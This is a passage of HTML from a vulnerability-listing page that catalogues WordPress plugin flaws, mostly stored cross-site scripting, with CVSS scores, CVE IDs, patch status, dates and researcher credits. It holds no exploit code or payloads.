<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd84a7b1-76f3-4c01-a935-ffec4a48b61b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e3f64c-1076-4247-9ee5-c1105edcfb39" target="_blank" rel="noopener">Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions &lt;= 3.8.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15016" target="_blank" rel="noopener noreferrer">							CVE-2026-15016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-memberships-pro" target="_blank" rel="noopener">Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions</a> <span class="wfvr-software-slug">[paid-memberships-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e3f64c-1076-4247-9ee5-c1105edcfb39" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddc7519-3ef0-449c-8190-fe0972c62703" target="_blank" rel="noopener">Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others &lt;= 3.33 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66434" target="_blank" rel="noopener noreferrer">							CVE-2026-66434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photonic" target="_blank" rel="noopener">Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others</a> <span class="wfvr-software-slug">[photonic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddc7519-3ef0-449c-8190-fe0972c62703" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b33aa60-ac20-42c3-a3ab-b29ddfe2284a" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;nav&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15645" target="_blank" rel="noopener noreferrer">							CVE-2026-15645						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b33aa60-ac20-42c3-a3ab-b29ddfe2284a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae04e9f2-0260-44bd-9439-cabf9d00fc2c" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;style&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15644" target="_blank" rel="noopener noreferrer">							CVE-2026-15644						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae04e9f2-0260-44bd-9439-cabf9d00fc2c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f86c6ada-112b-4b1f-b1ac-7dd4920953c8" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15649" target="_blank" rel="noopener noreferrer">							CVE-2026-15649						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f86c6ada-112b-4b1f-b1ac-7dd4920953c8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4c217c-3a61-4f96-a698-b7fba1294ace" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg &lt;= 1.5.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59559" target="_blank" rel="noopener noreferrer">							CVE-2026-59559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4c217c-3a61-4f96-a698-b7fba1294ace" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bae687b-5b54-4151-871e-7a9b6e56986e" target="_blank" rel="noopener">SendPulse Email Marketing Newsletter &lt;= 2.2.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via _sp_form_code Post Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13362" target="_blank" rel="noopener noreferrer">							CVE-2026-13362						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sendpulse-email-marketing-newsletter" target="_blank" rel="noopener">SendPulse Email Marketing Newsletter</a> <span class="wfvr-software-slug">[sendpulse-email-marketing-newsletter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bae687b-5b54-4151-871e-7a9b6e56986e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/056884d2-d737-4ae5-b800-cb2ff31347ab" target="_blank" rel="noopener">SureForms &lt;= 2.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;headingWrapper&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7623" target="_blank" rel="noopener noreferrer">							CVE-2026-7623						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms" target="_blank" rel="noopener">SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz</a> <span class="wfvr-software-slug">[sureforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/056884d2-d737-4ae5-b800-cb2ff31347ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/456377ec-1a73-4f9b-9fdf-0b5597e78aa5" target="_blank" rel="noopener">Ultimate Addons for Elementor &lt;= 1.45.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66688" target="_blank" rel="noopener noreferrer">							CVE-2026-66688						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-elementor" target="_blank" rel="noopener">Ultimate Addons for Elementor</a> <span class="wfvr-software-slug">[ultimate-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1a5d302225f6ffcbb6f31b7b9ca2ffc4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a5d302225f6ffcbb6f31b7b9ca2ffc4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener">Nguyen Ba Khanh &#8211; HPT Vietnam Corporation</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/456377ec-1a73-4f9b-9fdf-0b5597e78aa5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c82d8d-88eb-4159-af94-3f8e257dded6" target="_blank" rel="noopener">WowStore &lt;= 4.4.24 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;currentPostId&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17162" target="_blank" rel="noopener noreferrer">							CVE-2026-17162						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">WowStore – Store Builder &amp; Product Blocks for WooCommerce</a> <span class="wfvr-software-slug">[product-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c82d8d-88eb-4159-af94-3f8e257dded6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fae39bf9-8ceb-4cb1-afd1-522c885e6ef5" target="_blank" rel="noopener">WowStore &lt;= 4.4.24 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;filterMobileText&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17161" target="_blank" rel="noopener noreferrer">							CVE-2026-17161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">WowStore – Store Builder &amp; Product Blocks for WooCommerce</a> <span class="wfvr-software-slug">[product-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fae39bf9-8ceb-4cb1-afd1-522c885e6ef5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/588e12c4-7d68-40ac-82bc-aacc5d389dee" target="_blank" rel="noopener">WPC Badge Management for WooCommerce &lt;= 3.1.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;text&#8217; Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7436" target="_blank" rel="noopener noreferrer">							CVE-2026-7436						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpc-badge-management" target="_blank" rel="noopener">WPC Badge Management for WooCommerce</a> <span class="wfvr-software-slug">[wpc-badge-management]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/588e12c4-7d68-40ac-82bc-aacc5d389dee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60fd38f8-e864-4011-b9f9-b3fef6551175" target="_blank" rel="noopener">WPML Multilingual &amp; Multicurrency for WooCommerce &lt;= 5.5.6 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66711" target="_blank" rel="noopener noreferrer">							CVE-2026-66711						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-multilingual" target="_blank" rel="noopener">WPML Multilingual &amp; Multicurrency for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ca6e24c1152dfd748d1d9f882bdced9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ca6e24c1152dfd748d1d9f882bdced9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener">Coopernicus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60fd38f8-e864-4011-b9f9-b3fef6551175" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/547008fe-2585-4089-a710-71a83ae3d829" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.8 &#8211; Reflected Cross-Site Scripting via &#8216;param&#8217;</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17571" target="_blank" rel="noopener noreferrer">							CVE-2026-17571						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
